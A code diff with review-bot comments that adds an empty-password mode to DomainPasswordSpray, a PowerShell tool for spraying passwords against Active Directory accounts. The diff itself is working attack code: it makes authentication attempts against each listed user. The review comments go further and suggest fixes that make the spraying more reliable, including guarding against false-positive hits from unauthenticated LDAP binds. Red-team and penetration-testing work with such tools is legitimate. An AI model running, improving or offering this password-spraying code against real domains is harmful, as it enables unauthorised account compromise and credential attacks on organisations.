diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1
index 3395c47..a8cac3a 100644
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -45,6 +45,10 @@ function Invoke-DomainPasswordSpray{
 .PARAMETER UsernameAsPassword
 For each user, will try that user's name as their password
+
+ .PARAMETER EmptyPassword
+
+ For each user, will try an empty password
 .EXAMPLE
@@ -109,7 +113,11 @@ function Invoke-DomainPasswordSpray{
 $Delay=0,
 [Parameter(Position = 9, Mandatory = $false)]
- $Jitter=0
+ $Jitter=0,
+
+ [Parameter(Position = 7, Mandatory = $false)]
+ [switch]
+ $EmptyPassword
 )
@@ -121,6 +129,10 @@ function Invoke-DomainPasswordSpray{
 {
 $Passwords = ""
 }
+ elseif($EmptyPassword)
+ {
+ $Passwords = ""
+ }
 elseif($PasswordList)
 {
 $Passwords = Get-Content $PasswordList
@@ -215,6 +227,10 @@ function Invoke-DomainPasswordSpray{
 {
 Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword
 }
+ elseif($EmptyPassword)
+ {
+ Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -EmptyPassword
+ }
 else
 {
 for($i = 0; $i -lt $Passwords.count; $i++)
@@ -497,7 +513,10 @@ function Invoke-SpraySinglePassword
 $Jitter=0,
 [Parameter(Position=7)]
 [switch]
- $UsernameAsPassword
+ $UsernameAsPassword,
+ [Parameter(Position=8)]
+ [switch]
+ $EmptyPassword
 )
 $time = Get-Date
 $count = $UserListArray.count
@@ -512,6 +531,10 @@ function Invoke-SpraySinglePassword
 {
 $Password = $User
 }
+ elseif($EmptyPassword)
+ {
+ $Password = ""
+ }
 $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain,$User,$Password)
 if ($Domain_check.name -ne $null)
 {
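Review bot: In the `@@ -109,7 +113,11 @@` hunk the new `$EmptyPassword` switch is declared with `Position = 7` even though it follows `$Jitter` at position 9, so 7 is very likely already assigned to an earlier parameter that lies outside the hunk. A switch takes no value and gains nothing from positional binding, and a repeated position within one parameter set can at best do nothing and at worst make positional calls ambiguous; I would declare it as `[Parameter(Mandatory = $false)]` with no position. The same applies to `[Parameter(Position=8)]` on the switch added to `Invoke-SpraySinglePassword` in the `@@ -497,7 +513,10 @@` hunk. The param block starts and ends outside this hunk.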
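Review bot: The `elseif($EmptyPassword)` branch added in the `@@ -121,6 +129,10 @@` hunk makes the result depend silently on branch order when a caller combines `-EmptyPassword` with `-UsernameAsPassword` or `-PasswordList`: one mode runs and the other is dropped without a message. The same ordering is repeated in the dispatch at `@@ -215,6 +227,10 @@` and inside the per-user loop at `@@ -512,6 +531,10 @@`. Because every run makes a real authentication attempt against each listed account, the mode that actually ran should never be ambiguous; I would reject the combination before any work is done, e.g. `if ($EmptyPassword -and ($UsernameAsPassword -or $PasswordList)) { throw "-EmptyPassword cannot be combined with other password options" }`, or give the modes separate parameter sets. The `.PARAMETER EmptyPassword` help text should state the same restriction. The head of the if/elseif chain is outside the hunk, so its first condition is inferred from the matching branch in the later hunks.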
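Review bot: With `$Password = ""` in the `@@ -512,6 +531,10 @@` hunk, the unchanged success test `if ($Domain_check.name -ne $null)` may no longer prove that a credential was actually verified. LDAP simple binds treat a user name with a zero-length password as an unauthenticated bind (RFC 4513 §5.1.2), and whether the default authentication type of `DirectoryEntry($Domain,$User,$Password)` avoids that path is not visible here. I would confirm the behaviour against a test account that has a non-empty password and record the outcome in a comment above the branch, for example `# Empty string is passed as-is; confirmed the bind fails for accounts with a non-empty password`, so that a reported hit is not a false positive. The if/elseif chain and the loop around it begin outside the hunk.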